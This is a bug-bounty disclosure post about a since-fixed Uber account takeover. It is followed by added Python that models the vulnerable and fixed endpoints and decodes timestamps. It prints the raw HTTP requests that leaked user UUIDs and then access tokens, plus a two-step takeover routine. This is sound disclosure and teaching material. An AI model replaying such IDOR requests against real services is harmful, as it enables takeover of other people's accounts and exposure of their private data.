
How I could have hacked your Uber account

Anand Prakash
September 12th, 2019 · 2 min read

This is being published with the permission of Uber under the responsible disclosure policy. The vulnerability detailed in this blog post is being disclosed by Anand Prakash of AppSecure. This was plugged quickly by the security team at Uber.

This issue is similar to the Facebook access token leak disclosed last year: https://techcrunch.com/2018/09/28/facebook-says-50-million-accounts-affected-by-account-takeover-bug/

About Uber

Uber is a transportation network company (TNC) headquartered in San Francisco, California. Uber offers services including peer-to-peer ridesharing, taxi cab hailing, food delivery, and a bicycle-sharing system. The company has operations in 785 metropolitan areas worldwide. Uber has a valuation of over $100 billion as per Bloomberg’s report.

Description

This post describes an account takeover vulnerability in Uber that allowed an attacker to take over any other user's account (rider, partner/driver or Uber Eats) by supplying the victim's user UUID in an API request and using the access token leaked in the API response. The victim's UUID itself could be obtained from a second API by supplying their phone number or email address.

Because the leaked token was the one used by the Uber mobile application, an attacker holding it could track the victim's location, take rides on their account, and so on. The same chain worked against Uber driver (partner) and Eats accounts.

How my exploit worked step-by-step

Step #1 Getting the UUID of any Uber user

The addDriverV2 endpoint on partners.uber.com leaked the UUID of any Uber user (partner, rider or Uber Eats user) when given their phone number (API #1) or their email address (API #2): the "not found" error message echoed the UUID that the phone number or email had resolved to.

API #1

POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com

{"nationalPhoneNumber":"99999xxxxx","countryCode":"1"}

Response:

{
  "status": "failure",
  "data": {
    "code": 1009,
    "message": "Driver '47d063f8-0xx5e-xxxxx-b01a-xxxx' not found"
  }
}

The UUID quoted in the error message is the Uber UUID of the user whose phone number is 99999xxxxx.

API #2

POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com

{"email":"[email protected]"}

Response leaks UUID:

{
  "status": "failure",
  "data": {
    "code": 1009,
    "message": "Driver 'ca111b95-1111-4396-b907-83abxxx5f7371e' not found"
  }
}

'ca111b95-1111-4396-b907-83abxxx5f7371e' is the Uber UUID of the user whose email address is [email protected].

Step #2 Using the UUID to pull the victim's access token

With a victim's UUID from step 1, the request below can be replayed with that UUID in the body to retrieve the victim's private data, including the mobile-app access token, location and address. The access token gave complete control of the account: on our test accounts we could view ride history, request rides and see payment information using the leaked token.

The vulnerable Uber API:

POST /marketplace/_rpc?rpc=getConsentScreenDetails HTTP/1.1
Host: bonjour.uber.com
Connection: close
Content-Length: 67
Accept: application/json
Origin: https://bonjour.uber.com
x-csrf-token: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: xxxxx

{"language":"en","userUuid":"xxxx-776-4xxxx1bd-861a-837xxx604ce"}

The response returned the other user's entire record, including the mobile-app access token (token), the email verification token, the last selected payment profile UUID, signup coordinates and contact details:

{
  "status": "success",
  "data": {
    "data": {
      "language": "en",
      "userUuid": "xxxxxx1e"
    },
    "getUser": {
      "uuid": "cxxxxxc5f7371e",
      "firstname": "Maxxxx",
      "lastname": "XXXX",
      "role": "PARTNER",
      "languageId": 1,
      "countryId": 77,
      "mobile": null,
      "mobileToken": 1234,
      "mobileCountryId": 77,
      "mobileCountryCode": "+91",
      "hasAmbiguousMobileCountry": false,
      "lastConfirmedMobileCountryId": 77,
      "email": "[email protected]",
      "emailToken": "xxxxxxxx",
      "hasConfirmedMobile": "no",
      "hasOptedInSmsMarketing": false,
      "hasConfirmedEmail": true,
      "gratuity": 0.3,
      "nickname": "[email protected]",
      "location": "00000",
      "banned": false,
      "cardio": false,
      "token": "b8038ec4143bb4xxxxxx72d",
      "fraudScore": 0,
      "inviterUuid": null,
      "pictureUrl": "xxxxx.jpeg",
      "recentFareSplitterUuids": [
        "xxx"
      ],
      "lastSelectedPaymentProfileUuid": "xxxxxx",
      "lastSelectedPaymentProfileGoogleWalletUuid": null,
      "inviteCode": {
        "promotionCodeId": "xxxxx",
        "promotionCodeUuid": "xxxx",
        "promotionCode": "manishas105",
        "createdAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 76, 2, 21, 215, 101]
        },
        "updatedAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 76, 65, 211, 61, 9]
        }
      },
      "driverInfo": {
        "contactinfo": "999999999xx",
        "contactinfoCountryCode": "+91",
        "driverLicense": "None",
        "firstDriverTripUuid": null,
        "iphone": null,
        "partnerUserUuid": "xxxxxxx",
        "receiveSms": true,
        "twilioNumber": null,
        "twilioNumberFormatted": null,
        "cityknowledgeScore": 0,
        "createdAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 84, 21, 124, 80, 52]
        },
        "updatedAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 86, 152, 77, 41, 77]
        },
        "deletedAt": null,
        "driverStatus": "APPLIED",
        "driverFlowType": "UBERX",
        "statusLocks": null,
        "contactinfoCountryIso2Code": "KR",
        "driverEngagement": null,
        "courierEngagement": null
      },
      "partnerInfo": {
        "address": "Nxxxxxxx",
        "territoryUuid": "xxxxxx",
        "company": "None",
        "address2": "None",
        "cityId": 130,
        "cityName": "None",
        "firstPartnerTripUuid": null,
        "preferredCollectionPaymentProfileUuid": null,
        "phone": "",
        "phoneCountryCode": "+91",
        "state": "None",
        "vatNumber": "None",
        "zipcode": "None",
        "createdAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 84, 21, 124, 80, 52]
        },
        "updatedAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 101, 38, 177, 88, 137]
        },
        "deletedAt": null,
        "fleetTypes": [],
        "fleetServices": [],
        "isFleet": true
      },
      "analytics": {
        "signupLat": 133.28741199,
        "signupLng": 11177.1111,
        "signupTerritoryUuid": "xxxxx",
        "signupPromoId": null,
        "signupForm": "iphone",
        "signupSessionId": "xxxxxxx",
        "signupAppVersion": "2.64.1",
        "signupAttributionMethod": null,
        "createdAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 76, 2, 21, 219, 1]
        },
        "updatedAt": {
          "type": "Buffer",
          "data": [0, 0, 1, 76, 2, 21, 219, 1]
        },
        "signupCityId": 130,
        "signupDeviceId": null,
        "signupReferralId": null,
        "signupPromoCode": null,
        "signupPromoCodeUuid": null,
        "signupPromoUuid": null,
        "signupMethod": "REGULAR"
      },
      "createdAt": {
        "type": "Buffer",
        "data": [0, 0, 1, 76, 2, 21, 215, 153]
      },
      "updatedAt": {
        "type": "Buffer",
        "data": [0, 0, 1, 102, 81, 35, 153, 135]
      },
      "deletedAt": null,
      "tenancy": "uber/production",
      "mobileConfirmationStatus": "MOBILE_NOT_CONFIRMED",
      "nationalId": null,
      "nationalIdType": null,
      "merchantLocation": null,
      "lastConfirmedMobile": "xxxxxxxxxx",
      "requestedDeletionAt": null,
      "dateOfBirth": "xxxxxx",
      "userTypes": null,
      "preferredName": "xxxxxxxx",
      "freightInfo": null,
      "tempPictureUrl": null,
      "identityVerified": null,
      "paymentEntityType": null,
      "riderEngagement": null,
      "identityRejectReasonUuid": null,
      "genderInferred": null,
      "genderIdentity": null,
      "genderDocumented": null,
      "riderIneligibleWdw": null,
      "defaultPaymentProfileByProduct": null,
      "loginEligibility": null
    },
    "getDisclosureVersionUuid": "",
    "getLocaleCopy": null
  }
}
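The createdAt and updatedAt values in that response are not readable as printed: each is a JSON-serialised Buffer object holding eight bytes. The helper below is an added example, not part of the original post or of Uber's code. It walks a decoded response and turns every such Buffer into an ISO 8601 timestamp, so a leaked record can be read at a glance. It assumes the bytes are a big-endian count of milliseconds since the Unix epoch; the page does not state the encoding, but the sample values (copied from the root-level createdAt and updatedAt above) decode to dates in 2015 and 2018, which is consistent with that reading.

```python
import datetime as dt

# Constructed sample input: the root-level createdAt / updatedAt objects of the
# getUser record shown above, copied byte for byte.
SAMPLE_CREATED_AT = {"type": "Buffer", "data": [0, 0, 1, 76, 2, 21, 215, 153]}
SAMPLE_UPDATED_AT = {"type": "Buffer", "data": [0, 0, 1, 102, 81, 35, 153, 135]}


def _is_buffer8(value) -> bool:
    """True for a JSON-serialised Buffer carrying exactly eight bytes."""
    return (isinstance(value, dict)
            and value.get("type") == "Buffer"
            and isinstance(value.get("data"), list)
            and len(value["data"]) == 8)


def buffer_to_millis(value: dict) -> int:
    """Read an 8-byte Buffer as a big-endian unsigned integer.

    Treating the result as milliseconds since the Unix epoch is an assumption
    made for this example; the page itself does not document the encoding."""
    if not _is_buffer8(value):
        raise ValueError("expected a Buffer object with exactly 8 bytes")
    data = value["data"]
    if any(not (isinstance(b, int) and 0 <= b <= 255) for b in data):
        raise ValueError("Buffer bytes must be integers in 0..255")
    return int.from_bytes(bytes(data), "big")


def buffer_to_datetime(value: dict) -> dt.datetime:
    """Convert the Buffer to a timezone-aware UTC datetime without going through
    a float, so the millisecond part survives exactly."""
    millis = buffer_to_millis(value)
    base = dt.datetime.fromtimestamp(millis // 1000, tz=dt.timezone.utc)
    return base + dt.timedelta(milliseconds=millis % 1000)


def decode_timestamps(obj):
    """Recursively replace every 8-byte Buffer in a decoded JSON document with an
    ISO 8601 string. Every other value is returned unchanged, so the function can
    be run over the whole getUser record."""
    if _is_buffer8(obj):
        return buffer_to_datetime(obj).isoformat()
    if isinstance(obj, dict):
        return {k: decode_timestamps(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [decode_timestamps(v) for v in obj]
    return obj
```

Run over the full response, this turns the record's creation and last-update times into plain dates alongside the other leaked fields; a Buffer of any other length, or a non-Buffer object that happens to have a type key, is left as it is.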

Uber fixed the issue by authorising the getConsentScreenDetails request against the current user's session, so a caller can no longer ask for an arbitrary userUuid, and by removing sensitive fields such as the access token from the response.
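The complete chain from step 1 and step 2, together with the fix described above, as an added example that is not the post's code and not Uber's implementation: an in-memory model of the two endpoints with a vulnerable and a hardened version of each, and the attacker's two-step routine run against both. The store, the victim and attacker accounts, the fleet-membership check and the allow-list of consent-screen fields are assumptions made for the illustration.

```python
"""Toy model of the two endpoints in the post and of the fix it describes.
Constructed for illustration: the in-memory store, the attacker and victim
accounts, the fleet check and the allow-list are assumptions, not Uber's code."""
import re
import secrets
import uuid
from typing import Callable, Optional


def _new_user(firstname: str, email: str, phone: str, role: str) -> dict:
    return {
        "uuid": str(uuid.uuid4()),
        "firstname": firstname,
        "email": email,
        "mobile": phone,
        "role": role,
        # mobile-app access token: the field that turned a data leak into an ATO
        "token": secrets.token_hex(16),
        "emailToken": secrets.token_hex(8),
    }

# Constructed sample store. The attacker holds a valid session of their own.
VICTIM = _new_user("Maria", "rider@example.com", "5550001111", "RIDER")
ATTACKER = _new_user("Mallory", "mallory@example.com", "5550009999", "PARTNER")
USERS = {u["uuid"]: u for u in (VICTIM, ATTACKER)}
FLEET_DRIVERS: set = set()  # drivers already in the caller's fleet; empty here

def _resolve_user(body: dict) -> Optional[dict]:
    """Map the phone number or e-mail in the request body to a user record."""
    for u in USERS.values():
        if body.get("nationalPhoneNumber") == u["mobile"] or body.get("email") == u["email"]:
            return u
    return None

# ---- Step 1: addDriverV2 --------------------------------------------------
def add_driver_v2_vulnerable(body: dict) -> dict:
    """Resolve the contact to a user, then fail because that user is not in the
    caller's fleet. The failure message interpolates the resolved UUID: the leak."""
    user = _resolve_user(body)
    if user is None:
        return {"status": "failure", "data": {"code": 1009, "message": "Driver not found"}}
    if user["uuid"] not in FLEET_DRIVERS:
        return {"status": "failure",
                "data": {"code": 1009, "message": f"Driver '{user['uuid']}' not found"}}
    return {"status": "success", "data": {}}

def add_driver_v2_fixed(body: dict) -> dict:
    """Same control flow, but the error never echoes an internal identifier and is
    identical for an unknown contact and a known non-driver, so the endpoint stops
    being an oracle for which phone numbers and e-mails have Uber accounts."""
    user = _resolve_user(body)
    if user is None or user["uuid"] not in FLEET_DRIVERS:
        return {"status": "failure", "data": {"code": 1009, "message": "Driver not found"}}
    return {"status": "success", "data": {}}

# ---- Step 2: getConsentScreenDetails --------------------------------------
def get_consent_screen_details_vulnerable(session: dict, body: dict) -> dict:
    """Trust the userUuid in the body and return the whole record, token included.
    The session is never consulted: a textbook IDOR."""
    user = USERS.get(body.get("userUuid"))
    if user is None:
        return {"status": "failure", "data": {"message": "user not found"}}
    return {"status": "success", "data": {"getUser": dict(user)}}

CONSENT_SCREEN_FIELDS = ("uuid", "firstname", "role")  # assumed allow-list

def get_consent_screen_details_fixed(session: dict, body: dict) -> dict:
    """The fix the post describes: the subject comes from the authenticated session,
    a body userUuid that disagrees is rejected rather than honoured, and the response
    is built from an allow-list so new sensitive columns cannot leak by accident."""
    subject = session["userUuid"]
    if body.get("userUuid") not in (None, subject):
        raise PermissionError("userUuid does not match the authenticated session")
    user = USERS[subject]
    return {"status": "success",
            "data": {"getUser": {k: user[k] for k in CONSENT_SCREEN_FIELDS}}}

# ---- The chain ------------------------------------------------------------
_UUID_IN_MESSAGE = re.compile(r"'([0-9a-f-]{36})'")

def takeover_token(phone: str, add_driver: Callable, consent: Callable) -> Optional[str]:
    """Run the two-step chain with the attacker's own session against a pair of
    handlers. Return the victim's access token, or None if either step is closed."""
    resp = add_driver({"nationalPhoneNumber": phone, "countryCode": "1"})
    match = _UUID_IN_MESSAGE.search(resp["data"].get("message", ""))
    if match is None:
        return None  # step 1 no longer leaks a UUID
    try:
        details = consent({"userUuid": ATTACKER["uuid"]},
                          {"language": "en", "userUuid": match.group(1)})
    except PermissionError:
        return None  # step 2 now authorises against the session
    return details["data"]["getUser"].get("token")
```

Calling takeover_token with the two vulnerable handlers returns the victim's token; swapping in either fixed handler breaks the chain, which is the property a regression test for this class of bug should assert. Note that the fixed addDriverV2 returns the same body for an unknown contact and for a known user who is not a driver: different messages would still let an attacker confirm which phone numbers and e-mail addresses belong to Uber accounts, even with the UUID removed.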

Video Proof of Concept:

Disclosure Timeline

  • April 19, 2019 — Reported to Uber
  • April 25, 2019 — Report triaged
  • April 26, 2019 — Vulnerability fixed; bounty of $6,500 USD awarded
  • June 28, 2019 — Disclosure requested
  • September 9, 2019 — Report disclosed by Uber

Thanks for reading.

© 2019 AppSecure